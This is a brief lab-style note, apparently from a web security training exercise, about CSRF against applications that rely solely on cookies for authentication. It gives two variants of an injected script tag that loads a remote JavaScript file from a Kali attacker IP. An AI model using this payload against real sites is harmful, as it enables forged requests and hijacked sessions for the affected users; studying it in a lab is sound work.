This vulnerability hits the applications set all their authentication and session management mechanism purely on the top of cookies.
Kali IP: 192.168.1.128 You need to use below payload to trigger CSRF.
<script src="http://192.168.1.128/csrf3-2-2.js"></script>If it doesn't work, use this one.
<script src=http://192.168.1.128/csrf3-2-2.js></script>